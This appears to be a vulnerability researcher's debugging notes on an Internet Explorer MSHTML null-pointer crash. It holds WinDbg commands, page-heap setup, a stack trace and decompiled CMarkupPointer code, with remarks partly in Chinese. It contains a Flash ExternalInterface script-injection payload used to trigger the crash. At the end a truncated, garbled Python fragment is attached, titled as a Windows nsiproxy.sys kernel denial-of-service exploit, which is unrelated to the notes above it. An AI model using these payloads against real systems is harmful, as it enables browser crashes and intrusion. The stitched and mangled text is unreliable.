69eb0000 mshtml base | |
6a29753c 8b8390000000 mov eax,dword ptr [ebx+90h] ds:0023:00000090=???????? | |
0:005> u 6A32536D | |
MSHTML!CDisplayPointer::MoveToMarkupPointer+0xf6: | |
6a32536d e8ff231a00 call MSHTML!CDisplayPointer::GetLineInfo+0x200 (6a4c7771) | |
bp MSHTML!CDisplayPointer::MoveToMarkupPointer+0xf6 | |
bp MSHTML!CDisplayPointer::GetLineInfo+0x200 | |
sxe ld mshtml | |
ExternalInterface.call("0);}catch(e){};" + "location=\"javascript:''\"" + "//"); | |
//setInterval("0);}catch(e){};location=\"javascript:\'\'\"", 5000); | |
http://127.0.0.1/1.swf?js=location="javascript:''" | |
c:\Program Files\Debugging Tools for Windows>gflags.exe /i iexplorer.exe | |
No Registry Settings for iexplorer.exe executable | |
c:\Program Files\Debugging Tools for Windows>gflags.exe /i iexplorer.exe +hpa +ust | |
Current Registry Settings for iexplorer.exe executable are: 02001000 | |
ust - Create user mode stack trace database | |
hpa - Enable page heap | |
c:\Program Files\Debugging Tools for Windows>gflags.exe /i iexplorer.exe +hpa +ust | |
Current Registry Settings for iexplorer.exe executable are: 02001000 | |
ust - Create user mode stack trace database | |
hpa - Enable page heap | |
c:\Program Files\Debugging Tools for Windows> | |
windbg.exe -g -G -o "c:\Program Files\Internet Explorer\iexplore.exe" http://127.0.0.1/xss/1.swf?js=location="javascript:''" | |
6a7c0000 | |
bp !mshtml+4753C5 ".printf \"MSHTML!CDisplayPointer::GetLineInfo+0x200 eax: %p\", eax;.echo;g" | |
bp !mshtml+617689 ".printf \"MSHTML!"" ecx already 0 | |
bp !mshtml+6176EA ".printf \"call CMarkup::EnsureTopElems(void)!"" ecx already 0 | |
6add76da e8ba84d6ff call MSHTML!CMarkupPointer::CurrentScope (6ab3fb99) | |
6add76df 85c0 test eax,eax | |
6add76e1 7540 jne MSHTML!CDisplayPointer::GetLineInfo+0x29a (6add7723) | |
6add76e3 8b44240c mov eax,dword ptr [esp+0Ch] | |
6add76e7 8b4824 mov ecx,dword ptr [eax+24h] here!! | |
bp 6add76ef | |
bp 6add76ea | |
0:010> kb | |
ChildEBP RetAddr Args to Child | |
054bd058 6a4c77d7 00000000 0d2fede0 0d291498 MSHTML!CMarkup::EnsureTopElems+0xf | |
this 指针NULL | |
054bd070 6a325372 0d295408 054bd090 0d2c4350 MSHTML!CDisplayPointer::GetLineInfo+0x266 | |
054bd09c 6a233daa 0d291498 0d295408 00000000 MSHTML!CDisplayPointer::MoveToMarkupPointer+0xfb | |
IN THIS FUNC | |
054bd0d0 6a233b57 0d291498 0d295408 0d2caf68 MSHTML!CSelectionManager::CreateTrackerForContext+0x290 | |
054bd0f4 6a232d87 00000000 00000000 0d295408 MSHTML!CSelectionManager::SetEditContext+0xb5 | |
054bd164 6a236ea3 0d309de8 0d354088 00000000 MSHTML!CSelectionManager::SetEditContextFromElement+0x31c | |
054bd188 6a236d94 00000000 0d309de8 0e0b7fa8 MSHTML!CSelectionManager::SetInitialEditContext+0x6b | |
054bd1a4 6a237032 6a2e1a6c 0052fca8 0052f448 MSHTML!CSelectionManager::Initialize+0x1a2 | |
054bd1c8 6a166011 0e0b7fa8 0d3391b0 0e0cbdc8 MSHTML!CHTMLEditor::Initialize+0x174 | |
054bd1e8 6a2390c3 0d2a4d20 00000001 6c27a6ec MSHTML!CDoc::GetHTMLEditor+0x9f | |
054bd204 6a2a35ae 6c27a6ec 054bd258 00000000 MSHTML!CDoc::CreateServiceW+0x4f6 | |
054bd220 6c27a6d5 0052f448 6c27a494 6c27a6ec MSHTML!CDoc::QueryService+0x195 | |
054bd240 6c27a622 00000001 054bd258 0d2a3390 IEFRAME!CSelectionServicesListenerBase::_GetHTMLEditServices+0x41 | |
054bd260 6c27a523 054bd27c 0052fef8 00526140 IEFRAME!CSelectionServicesListenerBase::_GetSelectionServices2+0x33 | |
054bd280 6c27a86d 00526140 054bd2ac 0e095c00 IEFRAME!CSelectionInteractButtonHelper::_RegisterDocumentForNotifications+0x4a | |
054bd29c 6c2778cc 0e095c00 00509918 0052fef8 IEFRAME!CSelectionInteractButtonHelper::_s_MonitorRootDocument+0x5c | |
054bd2b0 6c27791b 00509744 00000000 00000004 IEFRAME!CSelectionInteractButtonHelper::s_AttachToWebBrowser+0x4a | |
054bd2cc 6c26e444 00509918 00000004 0e095c00 IEFRAME!CIEFrameAuto::COmWindow::ReadyStateChangedTo+0x48 | |
054bd500 6c26e56a 00000004 00000001 0d3391b0 IEFRAME!CDocObjectHost::_OnReadyState+0x90 | |
054bd564 6c26e4c0 0052ef38 054bd5b8 6a0fbdb1 IEFRAME!CDocObjectHost::_OnChangedReadyState+0xa6 | |
054bd570 6a0fbdb1 0052ef68 fffffdf3 0e0cbdc8 IEFRAME!CDocObjectHost::OnChanged+0x22 | |
054bd5b8 6a0fdc94 fffffdf3 00000001 054bd628 MSHTML!CBase::FirePropertyNotify+0x1b0 | |
054bd5f0 6a1b3bab 0e0cbdc8 00000004 0052f464 MSHTML!CMarkup::SetReadyState+0x409 | |
054bd65c 6a1b3a5a 0e0cbdc8 0052f464 0e0cbdc8 MSHTML!CMarkup::OnLoadStatusDone+0x2cf | |
054bd67c 6a1b3a4f 00000004 0054bec0 0054bef4 MSHTML!CMarkup::OnLoadStatus+0xb6 | |
054bdacc 6a11ff0c 00000000 00000014 054bdb18 MSHTML!CProgSink::DoUpdate+0x5dc | |
054bdadc 6a299f19 0d289f30 0d289f30 00000000 MSHTML!CProgSink::OnMethodCall+0x12 | |
054bdb18 6a2b9770 39e67f33 054bdbdc 00008002 MSHTML!GlobalWndOnMethodCall+0x115 | |
054bdb60 771e86ef 003c05e4 00000080 00000000 MSHTML!GlobalWndProc+0x302 | |
054bdb8c 771e8876 6a27460e 003c05e4 00008002 USER32!InternalCallWinProc+0x23 | |
054bdc04 771e89b5 00000000 6a27460e 003c05e4 USER32!UserCallWinProcCheckWow+0x14b | |
054bdc64 771e8e9c 6a27460e 00000000 054bfd9c USER32!DispatchMessageWorker+0x35e | |
054bdc74 6c28206c 054bdcbc 004ba7e8 004ba804 USER32!DispatchMessageW+0xf | |
054bfd9c 6c2a1dc6 004ba7e8 0049f9a8 777715e2 IEFRAME!CTabWindow::_TabWindowThreadProc+0x722 | |
054bfe58 777715f0 00838de0 004b7458 054bfe80 IEFRAME!LCIETab_ThreadProc+0x317 | |
054bfe68 6c29027b 0049f9a8 00000000 00000000 iertutil!CIsoScope::RegisterThread+0xab | |
054bfe80 77141154 004b7458 054bfecc 7796b299 IEFRAME!Detour_DefWindowProcA+0x6c | |
054bfe8c 7796b299 004b7458 776d1134 00000000 kernel32!BaseThreadInitThunk+0xe | |
WARNING: Stack unwind information not available. Following frames may be wrong. | |
054bfecc 7796b26c 6c290258 004b7458 ffffffff ntdll!RtlInitializeExceptionChain+0x63 | |
054bfee4 00000000 6c290258 004b7458 00000000 ntdll!RtlInitializeExceptionChain+0x36 | |
0:005> dds esp+0c | |
0250c984 001ade68 | |
001ade68--->eax | |
64a177cf 8b4824 mov ecx,dword ptr [eax+24h] ds:0023:001ade8c=00000000 | |
ba w4 001ade8c | |
bp MSHTML!CDisplayPointer::MoveToMarkupPointer+0xf6 ".if(1){.echo call FUNC1;gc}" | |
ba w4 001ade68 ".if(1){.echo w4 001ade68;dds 001ade68;gc}" | |
ba w4 001ade8c ".if(1){.echo w4 001ade8c;r;u;t;gc}" | |
0:005> dds 001ade68 | |
001ade68 647b2218 MSHTML!CMarkupPointer::`vftable' | |
001ade6c 00000001 | |
001ade70 00000000 | |
001ade74 00000008 | |
001ade78 00000000 | |
001ade7c 00000000 | |
001ade80 00000000 | |
001ade84 647e8430 MSHTML!CTraversalMarkupPointer::`vftable' | |
001ade88 056cc6a8 | |
001ade8c 00000000 | |
对 eax+24h处指针修改来源于2处: | |
1. | |
// IDA-style decompiler output; <eax>/<edi> mark the registers the
// arguments arrive in. a1 = the CMarkup* to attach, a2 = the
// CMarkupPointer object itself ("this").
// Stores a1 into the field at +36 (0x24). That is the slot the crashing
// instruction `mov ecx,dword ptr [eax+24h]` reads from the object at
// [esp+0Ch], where the dump shows it still 0.
// Returns whatever the virtual call at the end returns.
int __usercall CMarkupPointer::SetMarkup<eax>(int a1<eax>, int a2<edi>) | |
{ | |
int v3; // ebx@5 | |
// Bit 3 (mask 8) of the byte at +48 enables ref-counted replacement.
// The constructor clears the low byte of +48 (&= 0xFFFFFF00u), so a
// freshly constructed object takes the else branch below.
if ( *(a2 + 48) & 8 ) | |
{ | |
// Keep the previous markup so it can be released only after the new
// one has been referenced.
v3 = *(a2 + 36); | |
*(a2 + 36) = a1; | |
// The decompiler shows no arguments here; presumably a thiscall on
// a1 / v3 via ecx — confirm against the disassembly.
if ( a1 ) | |
CMarkup::ElementAddRef(); | |
if ( v3 ) | |
CMarkup::ElementRelease(); | |
} | |
else | |
{ | |
// Plain store, no reference-count adjustment.
*(a2 + 36) = a1; | |
} | |
// Virtual call through the vtable entry at byte offset 424 (slot 106
// on 32-bit), passing a2 as this.
return (*(*a2 + 424))(a2); | |
} | |
// IDA-style decompiler output of the constructor; a1<esi> is the raw
// object storage ("this"), a2 is stored verbatim at +32 (its meaning is
// not shown on this page). Returns a1.
// The `dds 001ade68` dump above matches this layout: +4 = 1, +8 = 0,
// +12 = 8, +16..+24 = 0, and +36 = 0 — the field GetLineInfo then
// dereferences via [eax+24h].
2.int __userpurge CMarkupPointer::CMarkupPointer<eax>(int a1<esi>, int a2) | |
{ | |
// Base-class vtable goes in first; replaced with CMarkupPointer's at the end.
*a1 = ITracker::_vftable_; | |
*(a1 + 20) = 0; | |
*(a1 + 24) = 0; | |
*(a1 + 16) = 0; | |
// Bumps the global g_lSecondaryObjCount (atomic increment).
InterlockedIncrement(&g_lSecondaryObjCount); | |
// Clears the low flag byte, including the mask-8 bit that SetMarkup tests.
*(a1 + 48) &= 0xFFFFFF00u; | |
*(a1 + 8) = 0; | |
*(a1 + 32) = a2; | |
// +36 (0x24): the markup slot SetMarkup writes. Starts NULL; in the
// crash dump (001ade8c) it is still NULL when read.
*(a1 + 36) = 0; | |
*(a1 + 40) = 0; | |
*(a1 + 44) = 0; | |
*(a1 + 56) = 0; | |
*(a1 + 60) = 0; | |
*(a1 + 64) = 0; | |
*(a1 + 68) = 0; | |
*(a1 + 4) = 1; | |
*(a1 + 12) = 8; | |
*a1 = &CMarkupPointer::_vftable_; | |
// Second vtable pointer at +28 (0x1c). In the dump this slot holds
// CTraversalMarkupPointer::`vftable', so a derived constructor
// presumably re-points it afterwards — not visible here.
*(a1 + 28) = &CMarkupPointer::_vftable_; | |
// -1 sentinel; semantics not visible on this page.
*(a1 + 52) = -1; | |
return a1; | |
} | |
3.int __stdcall CMarkupPointer::Unposition(int a1) | |
so the root cause is an uninitialized object: the pointer at +0x24 (offset 36) still holds the 0 the constructor wrote | |
problem: | |
1.how to slow it down | |
2.when to jit |
!/usr/bin/python
Title: Microsoft Windows Vista/Server 2008 "nsiproxy.sys" Local Kernel DoS Exploit
from ctypes import *
kernel32 = windll.kernel32
Psapi = windll.Psapi
if name == 'main':
GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
OPEN_EXISTING = 0x3
CREATE_ALWAYS = 0x2